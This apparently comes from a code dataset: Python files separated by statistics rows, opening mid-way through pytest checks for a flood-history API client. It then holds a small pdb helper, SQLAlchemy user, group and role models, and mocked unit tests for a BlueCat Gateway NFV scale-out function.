assert historic[0][0].historic is not None
assert historic[1][0].properties is not None
assert historic[0][0].valid_id is True
assert historic[1][0].valid_id is True
def test_multiple_csv(self, tmpdir):
fsid = [1982200, 3905074]
historic = fs.historic.get_events_by_location(fsid, "city", csv=True, output_dir=tmpdir)
assert len(historic[0]) == 2
assert len(historic[1]) == 2
historic[0].sort(key=lambda x: x.fsid)
historic[1].sort(key=lambda x: x.eventId)
assert historic[0][0].fsid == fsid[0]
assert historic[0][0].historic is not None
assert historic[0][1].fsid == fsid[1]
assert historic[0][1].historic is not None
assert historic[1][0].properties is not None
assert historic[1][1].properties is not None
assert historic[0][0].valid_id is True
assert historic[1][0].valid_id is True
assert historic[0][1].valid_id is True
assert historic[1][1].valid_id is True
def test_mixed_invalid(self):
fsid = [1982200, 000000000]
historic = fs.historic.get_events_by_location(fsid, "city")
assert len(historic[0]) == 2
assert len(historic[1]) == 1
historic[0].sort(key=lambda x: x.fsid, reverse=True)
historic[1].sort(key=lambda x: x.eventId, reverse=True)
assert historic[0][0].fsid == fsid[0]
assert historic[0][0].historic is not None
assert historic[0][1].fsid == fsid[1]
assert not historic[0][1].historic
assert historic[1][0].properties is not None
assert historic[0][0].valid_id is True
assert historic[1][0].valid_id is True
assert historic[0][1].valid_id is False
def test_mixed_invalid_csv(self, tmpdir):
fsid = [1982200, 000000000]
historic = fs.historic.get_events_by_location(fsid, "city", csv=True, output_dir=tmpdir)
assert len(historic[0]) == 2
assert len(historic[1]) == 1
historic[0].sort(key=lambda x: x.fsid, reverse=True)
historic[1].sort(key=lambda x: x.eventId, reverse=True)
assert historic[0][0].fsid == fsid[0]
assert historic[0][0].historic is not None
assert historic[0][1].fsid == fsid[1]
assert not historic[0][1].historic
assert historic[1][0].properties is not None
assert historic[0][0].valid_id is True
assert historic[1][0].valid_id is True
assert historic[0][1].valid_id is False
def test_coordinate_invalid(self, tmpdir):
historic = fs.historic.get_events_by_location([(82.487671, -62.374322)], "property",
csv=True, output_dir=tmpdir)
assert len(historic[0]) == 1
assert len(historic[1]) == 1
assert not historic[0][0].historic
assert historic[0][0].valid_id is False
assert not historic[1][0].properties
assert historic[0][0].valid_id is False
def test_single_coordinate(self, tmpdir):
historic = fs.historic.get_events_by_location([(40.7079652311, -74.0021455387)], "property",
csv=True, output_dir=tmpdir)
assert len(historic[0]) == 1
assert len(historic[1]) == 1
assert historic[0][0].historic is not None
assert historic[0][0].valid_id is True
assert historic[1][0].properties is not None
assert historic[0][0].valid_id is True
def test_address_invalid_404(self, tmpdir):
historic = fs.historic.get_events_by_location(["Shimik, Nunavut"], "property",
csv=True, output_dir=tmpdir)
assert len(historic[0]) == 1
assert len(historic[1]) == 1
assert not historic[0][0].historic
assert historic[0][0].valid_id is False
assert not historic[1][0].properties
assert historic[0][0].valid_id is False
def test_address_invalid_500(self, tmpdir):
historic = fs.historic.get_events_by_location(["Toronto, Ontario, Canada"], "property",
csv=True, output_dir=tmpdir)
assert len(historic[0]) == 1
assert len(historic[1]) == 1
assert not historic[0][0].historic
assert historic[0][0].valid_id is False
assert not historic[1][0].properties
assert historic[0][0].valid_id is False
def test_single_address(self, tmpdir):
historic = fs.historic.get_events_by_location(["247 Water St, New York, New York"], "property",
csv=True, output_dir=tmpdir)
assert len(historic[0]) == 1
assert len(historic[1]) == 1
assert historic[0][0].historic is not None
assert historic[0][0].valid_id is True
assert historic[1][0].properties is not None
assert historic[0][0].valid_id is True
def test_one_of_each(self, tmpdir):
historic = fs.historic.get_events_by_location([511447411], "property", csv=True, output_dir=tmpdir)
assert len(historic[0]) == 1
assert len(historic[1]) == 2
assert historic[0][0].valid_id is True
assert historic[1][0].valid_id is True
assert historic[0][0].fsid == 511447411
assert historic[0][0].historic is not None
assert historic[0][0].historic[0].get("eventId") is not None
assert historic[0][0].historic[0].get("name") is not None
assert historic[0][0].historic[0].get("type") is not None
assert historic[0][0].historic[0].get("depth") is not None
assert historic[1][0].name is not None
assert historic[1][0].type is not None
assert historic[1][0].month is not None
assert historic[1][0].year is not None
assert historic[1][0].returnPeriod is not None
assert historic[1][0].properties is not None
assert historic[1][0].properties.get("total") is not None
assert historic[1][0].properties.get("affected") is not None
assert historic[1][0].geometry is not None
historic = fs.historic.get_events_by_location([540225], "neighborhood", csv=True, output_dir=tmpdir)
assert len(historic[0]) == 1
assert len(historic[1]) == 1
assert historic[0][0].valid_id is True
assert historic[1][0].valid_id is True
assert historic[0][0].fsid == 540225
assert historic[0][0].historic is not None
assert historic[0][0].historic[0].get("eventId") is not None
assert historic[0][0].historic[0].get("name") is not None
assert historic[0][0].historic[0].get("type") is not None
assert historic[0][0].historic[0].get("data") is not None
assert historic[0][0].historic[0].get("data")[0].get("bin") is not None
assert historic[0][0].historic[0].get("data")[0].get("count") is not None
assert historic[1][0].name is not None
assert historic[1][0].type is not None
assert historic[1][0].month is not None
assert historic[1][0].year is not None
assert historic[1][0].returnPeriod is not None
assert historic[1][0].properties is not None
assert historic[1][0].properties.get("total") is not None
assert historic[1][0].properties.get("affected") is not None
assert historic[1][0].geometry is not None
historic = fs.historic.get_events_by_location([1982200], "city", csv=True, output_dir=tmpdir)
assert len(historic[0]) == 1
assert len(historic[1]) == 1
assert historic[0][0].valid_id is True
assert historic[1][0].valid_id is True
assert historic[0][0].fsid == 1982200
assert historic[0][0].historic is not None
assert historic[0][0].historic[0].get("eventId") is not None
assert historic[0][0].historic[0].get("name") is not None
assert historic[0][0].historic[0].get("type") is not None
assert historic[0][0].historic[0].get("data") is not None
assert historic[0][0].historic[0].get("data")[0].get("bin") is not None
assert historic[0][0].historic[0].get("data")[0].get("count") is not None
assert historic[1][0].name is not None
assert historic[1][0].type is not None
assert historic[1][0].month is not None
assert historic[1][0].year is not None
assert historic[1][0].returnPeriod is not None
assert historic[1][0].properties is not None
assert historic[1][0].properties.get("total") is not None
assert historic[1][0].properties.get("affected") is not None
assert historic[1][0].geometry is not None
historic = fs.historic.get_events_by_location([50156], "zcta", csv=True, output_dir=tmpdir)
assert len(historic[0]) == 1
assert len(historic[1]) == 1
assert historic[0][0].valid_id is True
assert historic[1][0].valid_id is True
assert historic[0][0].fsid == 50156
assert historic[0][0].historic is not None
assert historic[0][0].historic[0].get("eventId") is not None
assert historic[0][0].historic[0].get("name") is not None
assert historic[0][0].historic[0].get("type") is not None
assert historic[0][0].historic[0].get("data") is not None
assert historic[0][0].historic[0].get("data")[0].get("bin") is not None
assert historic[0][0].historic[0].get("data")[0].get("count") is not None
assert historic[1][0].name is not None
assert historic[1][0].type is not None
assert historic[1][0].month is not None
assert historic[1][0].year is not None
assert historic[1][0].returnPeriod is not None
assert historic[1][0].properties is not None
assert historic[1][0].properties.get("total") is not None
assert historic[1][0].properties.get("affected") is not None
assert historic[1][0].geometry is not None
historic = fs.historic.get_events_by_location([19153004900], "tract", csv=True, output_dir=tmpdir)
assert len(historic[0]) == 1
assert len(historic[1]) == 2
assert historic[0][0].valid_id is True
assert historic[1][0].valid_id is True
assert historic[0][0].fsid == 19153004900
assert historic[0][0].historic is not None
assert historic[0][0].historic[0].get("eventId") is not None
assert historic[0][0].historic[0].get("name") is not None
assert historic[0][0].historic[0].get("type") is not None
assert historic[0][0].historic[0].get("data") is not None
assert historic[0][0].historic[0].get("data")[0].get("bin") is not None
assert historic[0][0].historic[0].get("data")[0].get("count") is not None
assert historic[1][0].name is not None
assert historic[1][0].type is not None
assert historic[1][0].month is not None
assert historic[1][0].year is not None
assert historic[1][0].returnPeriod is not None
assert historic[1][0].properties is not None
assert historic[1][0].properties.get("total") is not None
assert historic[1][0].properties.get("affected") is not None
assert historic[1][0].geometry is not None
historic = fs.historic.get_events_by_location([19163], "county", csv=True, output_dir=tmpdir)
assert len(historic[0]) == 1
assert len(historic[1]) == 1
assert historic[0][0].valid_id is True
assert historic[1][0].valid_id is True
assert historic[0][0].fsid == 19163
assert historic[0][0].historic is not None
assert historic[0][0].historic[0].get("eventId") is not None
assert historic[0][0].historic[0].get("name") is not None
assert historic[0][0].historic[0].get("type") is not None
assert historic[0][0].historic[0].get("data") is not None
assert historic[0][0].historic[0].get("data")[0].get("bin") is not None
assert historic[0][0].historic[0].get("data")[0].get("count") is not None
assert historic[1][0].name is not None
assert historic[1][0].type is not None
assert historic[1][0].month is not None
assert historic[1][0].year is not None
assert historic[1][0].returnPeriod is not None
assert historic[1][0].properties is not None
assert historic[1][0].properties.get("total") is not None
assert historic[1][0].properties.get("affected") is not None
assert historic[1][0].geometry is not None
historic = fs.historic.get_events_by_location([1901], "cd", csv=True, output_dir=tmpdir)
assert len(historic[0]) == 1
assert len(historic[1]) == 2
assert historic[0][0].valid_id is True
assert historic[1][0].valid_id is True
assert historic[0][0].fsid == 1901
assert historic[0][0].historic is not None
assert historic[0][0].historic[0].get("eventId") is not None
assert historic[0][0].historic[0].get("name") is not None
assert historic[0][0].historic[0].get("type") is not None
assert historic[0][0].historic[0].get("data") is not None
assert historic[0][0].historic[0].get("data")[0].get("bin") is not None
assert historic[0][0].historic[0].get("data")[0].get("count") is not None
assert historic[1][0].name is not None
assert historic[1][0].type is not None
assert historic[1][0].month is not None
assert historic[1][0].year is not None
assert historic[1][0].returnPeriod is not None
assert historic[1][0].properties is not None
assert historic[1][0].properties.get("total") is not None
assert historic[1][0].properties.get("affected") is not None
assert historic[1][0].geometry is not None
historic = fs.historic.get_events_by_location([39], "state", csv=True, output_dir=tmpdir)
assert len(historic[0]) == 1
assert len(historic[1]) == 4
assert historic[0][0].valid_id is True
assert historic[1][0].valid_id is True
assert historic[0][0].fsid == 39
assert historic[0][0].historic is not None
assert historic[0][0].historic[0].get("eventId") is not None
assert historic[0][0].historic[0].get("name") is not None
assert historic[0][0].historic[0].get("type") is not None
assert historic[0][0].historic[0].get("data") is not None
assert historic[0][0].historic[0].get("data")[0].get("bin") is not None
assert historic[0][0].historic[0].get("data")[0].get("count") is not None
assert historic[1][0].name is not None
assert historic[1][0].type is not None
assert historic[1][0].month is not None
assert historic[1][0].year is not None
assert historic[1][0].returnPeriod is not None
assert historic[1][0].properties is not None
assert historic[1][0].properties.get("total") is not None
assert historic[1][0].properties.get("affected") is not None
assert historic[1][0].geometry is not None
| 47.400572 | 118 | 0.633538 | 4,819 | 33,133 | 4.278896 | 0.029052 | 0.164985 | 0.180407 | 0.152764 | 0.980019 | 0.977837 | 0.971096 | 0.956499 | 0.954219 | 0.943598 | 0 | 0.057469 | 0.237437 | 33,133 | 698 | 119 | 47.468481 | 0.758648 | 0.004618 | 0 | 0.867717 | 0 | 0 | 0.033178 | 0 | 0 | 0 | 0 | 0 | 0.719685 | 1 | 0.075591 | false | 0 | 0.006299 | 0 | 0.086614 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
ce41674e5c98a507c67558dcd338e1389b3281cd | 59 | py | Python | src/goat/debug_utils.py | ethanweber/goat | b691f7ce3d6ed554fb7d85cb841607fc0283c5c8 | [
"MIT"
] | 2 | 2021-07-27T22:14:00.000Z | 2021-11-28T04:59:24.000Z | src/goat/debug_utils.py | ethanweber/goat | b691f7ce3d6ed554fb7d85cb841607fc0283c5c8 | [
"MIT"
] | 1 | 2021-07-28T23:28:53.000Z | 2021-07-28T23:28:53.000Z | src/goat/debug_utils.py | ethanweber/goat | b691f7ce3d6ed554fb7d85cb841607fc0283c5c8 | [
"MIT"
] | null | null | null | import sys
import pdb
def set_trace():
pdb.set_trace() | 11.8 | 19 | 0.711864 | 10 | 59 | 4 | 0.6 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.186441 | 59 | 5 | 19 | 11.8 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
0239ced5c8efdbc28f15f88d56405ac406a6f575 | 4,431 | py | Python | dialogue-engine/src/programy/storage/stores/sql/dao/usergroup.py | cotobadesign/cotoba-agent-oss | 3833d56e79dcd7529c3e8b3a3a8a782d513d9b12 | [
"MIT"
] | 104 | 2020-03-30T09:40:00.000Z | 2022-03-06T22:34:25.000Z | dialogue-engine/src/programy/storage/stores/sql/dao/usergroup.py | cotobadesign/cotoba-agent-oss | 3833d56e79dcd7529c3e8b3a3a8a782d513d9b12 | [
"MIT"
] | 25 | 2020-06-12T01:36:35.000Z | 2022-02-19T07:30:44.000Z | dialogue-engine/src/programy/storage/stores/sql/dao/usergroup.py | cotobadesign/cotoba-agent-oss | 3833d56e79dcd7529c3e8b3a3a8a782d513d9b12 | [
"MIT"
] | 10 | 2020-04-02T23:43:56.000Z | 2021-05-14T13:47:01.000Z | """
Copyright (c) 2020 COTOBA DESIGN, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
"""
Copyright (c) 2016-2019 Keith Sterling http://www.keithsterling.com
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from sqlalchemy import Column, Integer, String
from programy.storage.stores.sql.base import Base
from programy.storage.stores.utils import DAOUtils
class AuthoriseUser(Base):
__tablename__ = 'authusers'
id = Column(Integer, primary_key=True)
name = Column(String(48))
def __repr__(self):
return "<AuthoriseUser(id='%s', name='%s')>" % (DAOUtils.valid_id(self.id), self.name)
class UserRole(Base):
__tablename__ = 'userroles'
id = Column(Integer, primary_key=True)
user = Column(String(48))
role = Column(String(48))
def __repr__(self):
return "<UserRole(id='%s', user='%s', role='%s')>" % (DAOUtils.valid_id(self.id), self.user, self.role)
class UserGroup(Base):
__tablename__ = 'usergroups'
id = Column(Integer, primary_key=True)
user = Column(String(48))
group = Column(String(48))
def __repr__(self):
return "<UserGroup(id='%s', user='%s', group='%s')>" % (DAOUtils.valid_id(self.id), self.user, self.group)
class AuthoriseGroup(Base):
__tablename__ = 'authgroups'
id = Column(Integer, primary_key=True)
name = Column(String(48))
parent = Column(String(48), nullable=True)
def __repr__(self):
return "<AuthoriseGroup(id='%s', name='%s', parent='%s')>" % (DAOUtils.valid_id(self.id), self.name, self.parent)
class GroupGroup(Base):
__tablename__ = 'groupgroups'
id = Column(Integer, primary_key=True)
group = Column(String(48))
subgroup = Column(String(48))
def __repr__(self):
return "<GroupGroup(id='%s', group='%s', subgroup='%s')>" % (DAOUtils.valid_id(self.id), self.group, self.subgroup)
class GroupRole(Base):
__tablename__ = 'grouproles'
id = Column(Integer, primary_key=True)
group = Column(String(48))
role = Column(String(48))
def __repr__(self):
return "<GroupRole(id='%s', group='%s', role='%s')>" % (DAOUtils.valid_id(self.id), self.group, self.role)
class GroupUser(Base):
__tablename__ = 'groupusers'
id = Column(Integer, primary_key=True)
group = Column(String(48))
user = Column(String(48))
def __repr__(self):
return "<GroupUser(id='%s', group='%s', user='%s')>" % (DAOUtils.valid_id(self.id), self.group, self.user)
| 39.212389 | 126 | 0.723087 | 630 | 4,431 | 4.974603 | 0.238095 | 0.056158 | 0.058073 | 0.049138 | 0.768028 | 0.768028 | 0.768028 | 0.732929 | 0.713784 | 0.655392 | 0 | 0.010332 | 0.169939 | 4,431 | 112 | 127 | 39.5625 | 0.841762 | 0.239675 | 0 | 0.490196 | 0 | 0 | 0.164014 | 0.020778 | 0 | 0 | 0 | 0 | 0 | 1 | 0.137255 | false | 0 | 0.058824 | 0.137255 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
026bc79d255ef34bb87d355a51c148c1677b7ee2 | 48 | py | Python | custommsg/helpmsg.py | IDoMaths/RuneFarmer | 1c05f84eea4b8c7791856ac23822ccf632e9af1b | [
"MIT"
] | null | null | null | custommsg/helpmsg.py | IDoMaths/RuneFarmer | 1c05f84eea4b8c7791856ac23822ccf632e9af1b | [
"MIT"
] | null | null | null | custommsg/helpmsg.py | IDoMaths/RuneFarmer | 1c05f84eea4b8c7791856ac23822ccf632e9af1b | [
"MIT"
] | null | null | null | def gethelpmsg():
return "sample help message" | 24 | 30 | 0.75 | 6 | 48 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.145833 | 48 | 2 | 30 | 24 | 0.878049 | 0 | 0 | 0 | 0 | 0 | 0.387755 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0.5 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
5a35215a16ab798bfb43b559ce1d24c6b3ff1656 | 72,792 | py | Python | tests/test_gateway_nfv_management.py | haihuynh-bluecat/gateway_nfv_plugin | 90019f86ad09a864198a74d7cdad4437d98bbf38 | [
"Apache-2.0"
] | null | null | null | tests/test_gateway_nfv_management.py | haihuynh-bluecat/gateway_nfv_plugin | 90019f86ad09a864198a74d7cdad4437d98bbf38 | [
"Apache-2.0"
] | null | null | null | tests/test_gateway_nfv_management.py | haihuynh-bluecat/gateway_nfv_plugin | 90019f86ad09a864198a74d7cdad4437d98bbf38 | [
"Apache-2.0"
] | null | null | null |
# Copyright 2019 BlueCat Networks (USA) Inc. and its affiliates
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=missing-docstring, missing-final-newline
import unittest
import sys
import context
from unittest import mock # pylint: disable=import-error
sys.modules["flask"] = mock.Mock()
sys.modules["suds"] = mock.Mock()
class TestGatewayNFVManagement(unittest.TestCase):
"""
Test Gateway NFV Plugin Management
"""
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.get_configurations')
def test_get_configuration_id(self, mock_get_configuration):
# pylint: disable=missing-docstring
configuration_list = [[124707, 'DemoConfig']]
configuration_name = "DemoConfig"
mock_get_configuration.return_value = configuration_list
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import get_configuration_id # pylint:disable=import-error
actual = get_configuration_id(configuration_name)
expected = 124707
self.assertEqual(expected, actual)
mock_get_configuration.assert_called_once_with()
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.get_configurations')
def test_get_configuration_id_none(self, mock_get_configuration):
# pylint: disable=missing-docstring
configuration_list = [["", "DemoConfig"]]
configuration_name = "DemoConfig"
mock_get_configuration.return_value = configuration_list
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import get_configuration_id # pylint:disable=import-error
actual = get_configuration_id(configuration_name)
expected = None
self.assertEqual(expected, actual)
mock_get_configuration.assert_called_once_with()
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.jsonify')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.get_configuration_id')
def test_scale_out_with_not_config_id(self, mock_get_configuration_id, mock_jsonify):
# pylint: disable=missing-docstring
config_id = None
data = ""
mock_get_configuration_id.return_value = config_id
jsonify = {"status": "Failed",
"message": "Configuration id not found!"}
mock_jsonify.return_value = jsonify
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import scale_out # pylint:disable=import-error
actual = scale_out(data)
expect = (jsonify, 404)
self.assertEqual(expect, actual)
mock_get_configuration_id.assert_called_once()
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.is_check_available_server')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.jsonify')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.get_configuration_id')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.read_config_json_file')
def test_scale_out_with_not_available_server(self, mock_read_config_json_file, mock_get_configuration_id, mock_jsonify, mock_is_check_available_server):
# pylint: disable=missing-docstring
data = {
"mgnt_server_ip": "192.168.88.169",
}
data_config = {
"server_ssh_username": "root",
"server_ssh_password": "123456",
"bam_config_name": "bam54",
"mgnt_server_ip": "192.168.88.169",
"server_deployment_password": "123456"
}
mock_read_config_json_file.return_value = data_config
config_id = 102728
mock_get_configuration_id.return_value = config_id
avail_server = False
mock_is_check_available_server.return_value = avail_server
jsonify = {"status": "Failed", "message": "No available server ip!"}
mock_jsonify.return_value = jsonify
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import scale_out # pylint:disable=import-error
actual = scale_out(data)
expect = (jsonify, 404)
self.assertEqual(expect, actual)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.process_password')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.is_check_available_server')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.get_configuration_id')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.read_config_json_file')
def test_scale_out_exception_metadata(self, mock_read_config_json_file, mock_get_configuration_id,
mock_is_check_available_server, mock_process_password, mock_g):
# pylint: disable=missing-docstring
data = {
"mgnt_server_ip": "192.168.88.169",
"metadata": None
}
data_config = {
"server_ssh_username": "root",
"server_ssh_password": "123456",
"bam_config_name": "bam54",
"mgnt_server_ip": "192.168.88.169",
"server_deployment_password": "123456"
}
mock_read_config_json_file.return_value = data_config
config_id = 102728
mock_get_configuration_id.return_value = config_id
avail_server = True
mock_is_check_available_server.return_value = avail_server
server_properties = "nhiii"
mock_process_password.return_value = server_properties
mock_g.user.logger.error.side_effect = Exception("exception")
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import scale_out # pylint:disable=import-error
with self.assertRaises(Exception):
scale_out(data)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.process_password')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.is_check_available_server')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.get_configuration_id')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.read_config_json_file')
def test_scale_out_with_exception_service_server_netmask(self, mock_read_config_json_file, mock_get_configuration_id,
mock_is_check_available_server, mock_process_password, mock_g):
# pylint: disable=missing-docstring
data = {
"mgnt_server_ip": "192.168.88.169",
"metadata": "nhii",
"service_server_netmask": 555,
"service_server_ipv4": None
}
data_config = {
"server_ssh_username": "root",
"server_ssh_password": "123456",
"bam_config_name": "bam54",
"mgnt_server_ip": "192.168.88.169",
"server_deployment_password": "123456"
}
mock_read_config_json_file.return_value = data_config
config_id = 102728
mock_get_configuration_id.return_value = config_id
avail_server = True
mock_is_check_available_server.return_value = avail_server
server_properties = "nhiii"
mock_process_password.return_value = server_properties
mock_g.user.logger.error.side_effect = Exception("exception")
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import scale_out # pylint:disable=import-error
with self.assertRaises(Exception):
scale_out(data)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.process_password')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.is_check_available_server')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.get_configuration_id')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.read_config_json_file')
def test_scale_out_with_exception_service_ipv6(self, mock_read_config_json_file, mock_get_configuration_id,
mock_is_check_available_server, mock_process_password, mock_g):
# pylint: disable=missing-docstring
data = {
"mgnt_server_ip": "192.168.88.169",
"metadata": "aaa",
"service_server_netmask": 24,
"service_server_ipv4": "1.1.1.1",
"service_server_v6_prefix": None,
"service_server_ipv6": None
}
data_config = {
"server_ssh_username": "root",
"server_ssh_password": "123456",
"bam_config_name": "bam54",
"mgnt_server_ip": "192.168.88.169",
"server_deployment_password": "123456"
}
mock_read_config_json_file.return_value = data_config
config_id = 102728
mock_get_configuration_id.return_value = config_id
avail_server = True
mock_is_check_available_server.return_value = avail_server
server_properties = "nhiii"
mock_process_password.return_value = server_properties
mock_g.user.logger.error.side_effect = Exception("exception")
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import scale_out # pylint:disable=import-error
with self.assertRaises(Exception):
scale_out(data)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.jsonify')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.process_password')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.create_deployment_roles')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.add_server')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.is_check_available_server')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.get_configuration_id')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.read_config_json_file')
def test_scale_out_with_none_role_id(self, mock_read_config_json_file, mock_get_configuration_id, mock_is_check_available_server,
mock_add_server, mock_create_deployment_roles, mock_process_password, mock_jsonify):
# pylint: disable=missing-docstring
data = {
"mgnt_server_ip": "192.168.88.169",
"metadata": "can_scale_in=True",
"service_server_netmask": 24,
"service_server_ipv4": "1.1.1.1",
"service_server_v6_prefix": "nhii",
"service_server_ipv6": "11.11.11.11",
"server_name": "bdds"
}
data_config = {
"server_ssh_username": "root",
"server_ssh_password": "123456",
"bam_config_name": "bam54",
"mgnt_server_ip": "192.168.88.169",
"server_deployment_password": "123456",
"server_cap_profile": True,
"dns_view_names": "view",
"server_deploy_role": "server"
}
mock_read_config_json_file.return_value = data_config
config_id = 102728
mock_get_configuration_id.return_value = config_id
avail_server = True
mock_is_check_available_server.return_value = avail_server
server_properties = "nhiii"
mock_process_password.return_value = server_properties
server_id = 334498
mock_add_server.return_value = server_id
role_id = 123
mock_create_deployment_roles.return_value = role_id
jsonify = {"status": "Failed", "message": "Create deployment role failed"}
mock_jsonify.return_value = jsonify
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import scale_out # pylint:disable=import-error
actual = scale_out(data)
expect = (jsonify, 500)
self.assertEqual(expect, actual)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.jsonify')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.process_password')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.create_deployment_roles')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.add_server')
